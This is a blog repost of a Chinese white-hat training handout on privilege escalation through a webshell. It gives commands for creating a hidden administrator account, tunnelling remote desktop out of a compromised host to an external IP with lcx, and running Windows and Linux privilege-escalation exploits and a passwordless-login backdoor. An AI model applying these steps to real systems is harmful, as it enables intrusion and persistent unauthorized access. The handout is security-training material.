<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>Hexo</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Velpro_Q&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Velpro_Q&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title"></h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">John Doe</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">December 4, 2019&nbsp;&nbsp;19:00:32</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="米斯特白帽培训讲义-漏洞篇-提权"><a href="#米斯特白帽培训讲义-漏洞篇-提权" class="headerlink" title="米斯特白帽培训讲义 漏洞篇 提权"></a>米斯特白帽培训讲义 漏洞篇 提权</h1><blockquote>
<p>讲师：<a href="https://www.zhihu.com/people/gh0stkey/answers" target="_blank" rel="noopener">gh0stkey</a></p>
</blockquote>
<blockquote>
<p>整理：<a href="https://github.com/" target="_blank" rel="noopener">飞龙</a></p>
</blockquote>
<blockquote>
<p>协议：<a href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a></p>
</blockquote>
<p>提权，顾名思义就是提高自己在服务器中的权限，就比如在 Windows 中你本身登录的用户是 guest，通过提权后就变成超级管理员，拥有了管理 Windows 的所有权限。提权是黑客的专业名词，一般用于网站入侵和系统入侵。本讲义所讲的是基于 WebShell 的菜刀管理下提权。</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb4ccprz1aj20wv093weo.jpg" alt></p>
<h2 id="基本-Dos-命令、常识"><a href="#基本-Dos-命令、常识" class="headerlink" title="基本 Dos 命令、常识"></a>基本 Dos 命令、常识</h2><ul>
<li><code>whoami</code>：查看当前用户名，用于查看权限大小。</li>
<li><code>ipconfig</code>：显示当前 TCP/IP 配置，用于查看 IP。</li>
<li><code>net user</code>：查看当前系统的所有用户。</li>
<li><code>net user &lt;用户名&gt; &lt;用户密码&gt; /add</code>：创建用户。</li>
<li><code>net localgroup administrators &lt;用户名&gt; /add</code>：将用户加入<code>administrators</code>用户组。</li>
<li>远程连接默认端口：3389。</li>
</ul>
<p>下面拿菜刀中的 Shell 演示一遍这几个命令。</p>
<p>首先是<code>whoami</code>，可以看到<code>administrator</code>，应该是管理员。</p>
<p><img src="http://ww2.sinaimg.cn/large/841aea59jw1fb4cctvg5kj20ht0750st.jpg" alt></p>
<p>然后是<code>ipconfig</code>，我们可以看到<code>192.168.175.129</code>，这是内网的 IP。</p>
<p><img src="http://ww1.sinaimg.cn/large/841aea59jw1fb4ccy6hwjj20dz0ddt96.jpg" alt></p>
<p>然后是<code>net user</code>：</p>
<p><img src="http://ww4.sinaimg.cn/large/841aea59jw1fb4cd0wn1qj20hd04agll.jpg" alt></p>
<p>知道这些用户之后，我们需要创建自己的用户<code>mst</code>。创建后再执行<code>net user</code>，可以看到创建成功：</p>
<p><img src="http://ww2.sinaimg.cn/large/841aea59jw1fb4cd3tly5j20hz064mx8.jpg" alt></p>
<p>接下来我们创建一个名为<code>mst$</code>的用户：</p>
<p><img src="http://ww4.sinaimg.cn/large/841aea59jw1fb4cd642xxj20h90680st.jpg" alt></p>
<p>可以看到它并没有显示在用户列表中，之后我们再执行<code>net user mst$</code>：</p>
<p><img src="http://ww2.sinaimg.cn/large/841aea59jw1fb4cd9err5j20az0bpwep.jpg" alt></p>
<p>它又是确实存在的，这就是隐藏用户的一个小技巧。</p>
<p>之后我们把<code>mst$</code>添加到管理员组中，并且查看它的信息，我们发现它成功刚添加到了管理员组中。</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb4cdbd37oj20g20dn0t3.jpg" alt></p>
<p>现在我们查看远程连接的端口，首先执行<code>tasklist /svc</code>，寻找<code>TermService</code>：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-7148e693db4563e4.jpg" alt></p>
<p>我们看到它的 PID 为 1504。之后执行<code>netstat -ano</code>：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-788dc8fc6737406e.jpg" alt></p>
<p>寻找 PID 为 1504 的一行，可以看到它的端口是 3389。</p>
<p>需要远程连接的时候，输入刚刚创建的用户名和密码就可以了。</p>
<h2 id="突破限制"><a href="#突破限制" class="headerlink" title="突破限制"></a>突破限制</h2><p>假如说我们在实际情况中看到了<code>[Err]拒绝访问</code>：</p>
<p><img src="http://ww4.sinaimg.cn/large/841aea59jw1fb4cdxua7dj20f005ojre.jpg" alt></p>
<p>那我们可以找到自己电脑上的<code>cmd.exe</code>，然后上传上去。比如上传路径如下：</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb4cde71lej20sl0a8759.jpg" alt></p>
<p>我们就可以执行<code>setp &lt;路径&gt;\cmd.exe</code>：</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb4cdj9462j20iu05r0su.jpg" alt></p>
<p>我们再来看各种命令：</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb4cdmk7agj20rm0f30te.jpg" alt></p>
<p><img src="http://ww2.sinaimg.cn/large/841aea59jw1fb4cdplki6j20df03twef.jpg" alt></p>
<p><code>net user</code>还是拒绝访问的，我们用老方法，找到自己电脑中的<code>net.exe</code>，然后传上去。之后执行<code>&lt;路径&gt;\net.exe user</code>：</p>
<p><img src="http://ww4.sinaimg.cn/large/841aea59jw1fb4cdsd6xgj20hq04174a.jpg" alt></p>
<p>可以看到突破了限制。</p>
<h2 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h2><p>在提权过程中，我们经常碰到这样的情况：</p>
<p><img src="http://ww4.sinaimg.cn/large/841aea59jw1fb56mw6pk7j20d508mwew.jpg" alt></p>
<p>我们可以看到 WebShell 的主机处于内网下，内网的意思就是说，它能连接别人，但别人不能连接它，就跟连接路由器的个人电脑差不多。</p>
<p>那么这种情况下，我们就需要用到端口转发工具<code>lcx.exe</code>，除此之外，还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡，独立 IP 主机叫做本机。</p>
<p>将<code>lcx.exe</code>上传至本机和肉鸡之后，首先确定本机的 IP 为<code>119.90.140.191</code>：</p>
<p><img src="http://ww3.sinaimg.cn/large/841aea59jw1fb56n00sppj208h020743.jpg" alt></p>
<p>然后我们在本机执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lcx.exe -listen 51 3388</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/841aea59jw1fb56n2ux6ej20gt07kjrv.jpg" alt></p>
<p>这条命令的意思就是说，监听本机的 51 和 3388 端口，并将两个端口互相转发，端口 51 的入境流量发给端口 3388，反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口，为了避免与本机的远程连接服务冲突，选择了 3388。大家可以自行选择其他未占用端口。</p>
<p>然后我们在肉鸡上执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389</span><br></pre></td></tr></table></figure>

<p><img src="http://ww2.sinaimg.cn/large/841aea59jw1fb56n5zhs8j20lo026glh.jpg" alt></p>
<p>这条命令连接肉鸡的 3389 端口，和本机的 51 端口，并互相转发。</p>
<p>之后，我们在本机或其他主机上使用远程连接客户端，连接<code>119.90.140.191:3388</code>，可以看到<code>lcx</code>中显示了转发的信息。</p>
<p><img src="http://ww1.sinaimg.cn/large/841aea59jw1fb56n8h5txj20gt0a10tg.jpg" alt></p>
<p>远程连接客户端的封包会发给主机的<code>lcx</code>，之后会发给肉鸡的<code>lcx</code>，之后会发给肉鸡的远程连接服务。响应封包会按原路返回。</p>
<p>等待一会儿之后，我们成功连接了肉鸡的远程桌面：</p>
<p><img src="http://ww1.sinaimg.cn/large/841aea59jw1fb56nbetaaj20j50cjgll.jpg" alt></p>
<h2 id="Windows-Exp-提权"><a href="#Windows-Exp-提权" class="headerlink" title="Windows Exp 提权"></a>Windows Exp 提权</h2><p>Exp 提权用于普通方式不好用的时候。</p>
<p>首先我们通过<code>systeminfo</code>查看补丁：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-db62a3154e7c0d45.jpg" alt></p>
<p>我们可以看到它安装了<code>Q147222</code>。</p>
<p>然后我们使用<a href="https://github.com/gh0stkey/GetRoot-Tools" target="_blank" rel="noopener">GetRoot Tools</a>工具，打开它，主界面是这样的：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-420f6ca77da5d0fb.jpg" alt></p>
<p>我们选中上面的 Windows 2003，然后把<code>[01]: Q147222</code>复制到上方的输入框中。之后点击<code>Search</code>：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-9b5f1021c8dc0a1a.jpg" alt></p>
<p>这就是我们可以使用的 Exp。我们随便选择一个，比如<code>MS15-051</code>。我们可以在课件中的 MS 提权集（<code>提权-扩大战果/扩大战果-提权之Exploit提权&amp;上帝之门(Windows).zip -&gt; ms提权集/ms15-051/ms15-051</code>）中找到它。</p>
<p>我们需要根据系统的版本来选择 Exp，这里系统是 32 位的，我们就应该选择<code>Win32/32.exe</code>。上传之后，我们可以使用<code>dir</code>命令在目录中看到它：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-3f57e43595b04f20.jpg" alt></p>
<p>它的使用方法是<code>&lt;exp.exe&gt; &quot;&lt;cmd 命令&gt;&quot;</code>，例如，我们执行<code>net user</code>：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-1f48ecf494eb4ffb.jpg" alt></p>
<p>我们可以看到命令执行成功。</p>
<h2 id="上帝之门"><a href="#上帝之门" class="headerlink" title="上帝之门"></a>上帝之门</h2><p>上帝之门 Exp 用于开启 Windows 的“上帝模式”，即任意账户无密码登录。它需要能上传并且执行 EXE 文件。使用方法为<code>NtGodMode.exe [ON|OFF]</code>。我们可以在课件中（<code>提权-扩大战果/扩大战果-提权之Exploit提权&amp;上帝之门(Windows).zip -&gt; NtGodMode.exe</code>）找到它。</p>
<p>上传之后，执行<code>NtGodMode.exe ON</code>：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-7ab4611985b296cc.jpg" alt></p>
<p>然后通过远程连接登录目标主机，将用户名输入为<code>admin</code>，密码任意填写。</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-11fc859cbaab9b5a.jpg" alt></p>
<p>可以进入目标主机。</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-32dd69303a92b072.jpg" alt></p>
<p>注意，必须是输入已有用户名，不存在的用户名是不行的。</p>
<h2 id="Linux-Exp-提权"><a href="#Linux-Exp-提权" class="headerlink" title="Linux Exp 提权"></a>Linux Exp 提权</h2><p>首先根据<code>uname -a</code>查看内核版本，之后根据内核版本找 Exp：</p>
<p><img src="http://upload-images.jianshu.io/upload_images/118142-5ee0c8d4aa934af1.png" alt></p>
<p>之后我们执行以下命令来编译：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -pthread exp.c -o exp</span><br></pre></td></tr></table></figure>

<p>然后执行<code>./exp</code>来执行 Exp。我们一开始的用户可能是<code>xxx@yyy</code>，执行之后就变成了<code>root@yyy</code>，这样就算提权成功。</p>
<h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h2><ul>
<li><p><a href="http://bbs.ichunqiu.com/thread-19368-1-1.html" target="_blank" rel="noopener">米斯特白帽子培训第二期视频教程</a></p>
</li>
<li><p><a href="http://www.jianshu.com/p/0c26e7eaf226" target="_blank" rel="noopener">Kali Linux 秘籍 第七章 权限提升</a></p>
</li>
<li><p><a href="http://m.bobao.360.cn/learning/detail/3123.html" target="_blank" rel="noopener">CVE-2016-5195 脏牛漏洞</a></p>
</li>
</ul>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>John Doe</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://yoursite.com/2019/12/04/漏洞篇 提权/">http://yoursite.com/2019/12/04/漏洞篇 提权/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY<strong>?</strong></strong></span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2019/12/04/漏洞篇 中间件/"></a>
            
            
            <a class="next" rel="next" href="/2019/12/04/漏洞篇 文件上传/"></a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© John Doe | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
